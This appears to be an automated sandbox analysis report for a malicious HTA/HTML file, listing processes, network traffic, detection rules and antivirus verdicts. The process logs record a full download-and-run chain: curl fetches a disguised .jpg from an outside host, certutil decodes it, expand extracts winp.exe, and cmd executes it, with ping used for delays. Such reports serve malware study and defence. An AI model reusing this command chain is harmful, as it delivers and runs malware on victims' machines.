Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Jan. 16, 2024, 10:01 a.m. | Jan. 16, 2024, 10:03 a.m. |
Process | Command line | PID |
---|---|---|
iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\M.hta.html | 2612 |
PING.EXE | ping -n 10 127.0.0.1 | 2056 |
PING.EXE | ping -n 20 127.0.0.1 | 2492 |
curl.exe | "C:\util\curl\curl.exe" https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg | 2248 |
certutil.exe | "C:\Windows\System32\certutil.exe" -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp" | 676 |
PING.EXE | ping -n 10 127.0.0.1 | 2976 |
expand.exe | "C:\Windows\System32\expand.exe" C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe | 2272 |
PING.EXE | ping -n 5 127.0.0.1 | 2180 |
cmd.exe | "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe | 2428 |
iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:79876 | 2936 |
Name | Response | Post-Analysis Lookup |
---|---|---|
mail.chapanakit-rta.com | 203.113.25.99 | |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49172 203.113.25.99:443 | C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
TLSv1 192.168.56.101:49174 203.113.25.99:443 | None | None | None |
TLSv1 192.168.56.101:49171 203.113.25.99:443 | C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
TLSv1 192.168.56.101:49175 203.113.25.99:443 | None | None | None |
TLS 1.2 192.168.56.101:49182 203.113.25.99:443 | C=BE, O=GlobalSign nv-sa, CN=AlphaSSL CA - SHA256 - G4 | CN=*.chapanakit-rta.com | 71:c1:ac:d9:40:ee:0f:2b:f4:f8:b9:d7:c2:d3:69:e5:47:a5:30:cc |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://mail.chapanakit-rta.com/images/happynewyear.jpg |
request | GET https://mail.chapanakit-rta.com/favicon.ico |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul |
cmdline | "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Bypass DEP | rule | disable_dep |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | Checks if being debugged | rule | anti_dbg |
description | Bypass DEP | rule | disable_dep |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul |
cmdline | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul |
cmdline | ping -n 5 127.0.0.1 |
cmdline | ping -n 20 127.0.0.1 |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409 |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul |
cmdline | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul |
cmdline | ping -n 10 127.0.0.1 |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:79876 |
host | 117.18.232.200 |
Engine | Detection |
---|---|
Lionic | Trojan.HTML.SAgent.4!c |
VIPRE | Generic.JS.Downloader.A.7F4138D0 |
Arcabit | Generic.JS.Downloader.A.7F4138D0 |
Symantec | Trojan Horse |
ESET-NOD32 | JS/TrojanDownloader.Agent.AALB |
Avast | Other:Malware-gen [Trj] |
Kaspersky | HEUR:Trojan.HTA.SAgent.gen |
BitDefender | Generic.JS.Downloader.A.7F4138D0 |
MicroWorld-eScan | Generic.JS.Downloader.A.7F4138D0 |
Rising | Downloader.Agent/JS!8.10EAD (TOPIS:E0:oPn7BTjgPIO) |
Emsisoft | Generic.JS.Downloader.A.7F4138D0 (B) |
Microsoft | Trojan:HTML/Phish!MSR |
ZoneAlarm | HEUR:Trojan.HTA.SAgent.gen |
GData | Generic.JS.Downloader.A.7F4138D0 |
Tencent | Js.Trojan-Downloader.Er.Rgil |
Ikarus | Virus.SuspectCRC |
AVG | Other:Malware-gen [Trj] |
parent_process | iexplore.exe | martian_process | cmd /c c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 10 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 5 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\expand.exe" C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 10 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | C:\Windows\System32\cmd.exe /c ping -n 20 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | https://mail.chapanakit-rta.com/images/happynewyear.jpg |
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 20 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | cmd /c c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\cmd.exe" /c c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | curl https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg |
parent_process | iexplore.exe | martian_process | "C:\Windows\system32\cmd.exe" /c ping -n 5 127.0.0.1 > nul |
parent_process | iexplore.exe | martian_process | "C:\util\curl\curl.exe" https://mail.chapanakit-rta.com/pt/wct9D39.jpg -o C:\Users\Public\Documents\wct9D39.jpg |
parent_process | iexplore.exe | martian_process | certutil.exe -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp" |
parent_process | iexplore.exe | martian_process | expand C:\Users\Public\Documents\wct9D39.tmp -f:* c:\users\public\Videos\winp.exe |
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\certutil.exe" -decode "C:\Users\Public\Documents\wct9D39.jpg" "C:\Users\Public\Documents\wct9D39.tmp" |